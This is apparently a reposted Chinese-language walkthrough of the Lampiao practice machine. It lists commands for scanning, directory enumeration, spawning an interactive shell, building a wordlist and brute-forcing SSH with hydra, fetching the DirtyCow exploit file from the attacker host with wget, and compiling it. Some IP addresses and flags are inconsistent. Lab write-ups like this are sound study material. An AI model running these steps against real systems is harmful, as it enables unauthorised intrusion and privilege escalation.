Lampiao靶場-dirtycow漏洞利用
目錄- Lampiao靶場-dirtycow漏洞利用
- 一、主機發現
- 二、埠掃描
- 三、目錄遍歷
- 四、拿到webshell
- 五、實作互動式shell
- 六、暴力破解
- 七、把dirtycow腳本傳到靶機
- 八、編譯運行dirtycow腳本
只是簡單記錄一下所用工具
靶機資訊:
靶機:192.168.142.132
攻擊機:192.168.142.133
一、主機發現
nmap -sP 192.168.142.0/24
需要自己判斷一下,哪臺是靶機,
二、埠掃描
nmap -A -p- 192.168.142.132
進行埠掃描,獲取埠資訊,發現有22、80、1898埠開放
三、目錄遍歷
目錄遍歷可以使用dirb或者dirsearch工具
dirb http://192.168.142.133:1898
或
python3 dirsearch.py -u http://192.168.142.133:1898
個人感覺dirsearch比較速度更快
四、拿到webshell
這里就不寫了,網上太多了,
五、實作互動式shell
python -c "import pty;pty.spawn('/bin/bash')"
其他方式參考大佬的文章,發現好東西就分享,我就不復制粘貼了,
https://saucer-man.com/information_security/233.html
六、暴力破解
因為有22埠,存在爆破的可能性,先收集一下網站資訊做一個字典
cewl http://192.168.142.133:1898 -w lampiao.txt
用hydra進行ssh的暴力破解
hydra -l tiago -P lampiao.txt 192.168.142.133 ssh
補充:
-l后面加用戶名,拿到互動式shell后可以查詢一下/etc/passwd檔案,自然可以拿到用戶名,前期是拿不到其他用戶名的,發現22埠開放也只能爆破root,
如果直接爆破root成功,恭喜你游戲結束,
七、把dirtycow腳本傳到靶機
1、用python開啟http服務
在攻擊機上用python開啟一個埠為3333的http服務
python -m http.server 3333
靶機用wget下載dirtycow腳本,當然有一些細節,需要自己去思考,
wget http://192.168.142.133:3333/40847.cpp
2、ssh服務傳輸檔案
參考資料:
https://zhuanlan.zhihu.com/p/507876254
攻擊機上運行:
rsync 40847.cpp [email protected]:/home/tiago
或者
靶機上運行:
rsync [email protected]:/root/桌面/40847.cpp .(.是代表當前路徑)
八、編譯運行dirtycow腳本
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
- -Wall 一般使用該選項,允許發出GCC能夠提供的所有有用的警告
- -pedantic 允許發出ANSI/ISO C標準所列出的所有警告
- -O2編譯器的優化選項的4個級別,-O0表示沒有優化,-O1為預設值,-O3優化級別最高
- -std=c++11就是用按C++2011標準來編譯的
- -pthread 在Linux中要用到多執行緒時,需要鏈接pthread庫
- -o dcow gcc生成的目標檔案,名字為dcow
參考資料:
https://blog.csdn.net/weixin_43715506/article/details/113410027
https://blog.csdn.net/qq_42967398/article/details/102536576
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/549751.html
標籤:其他
下一篇:測驗1號位的自我修養
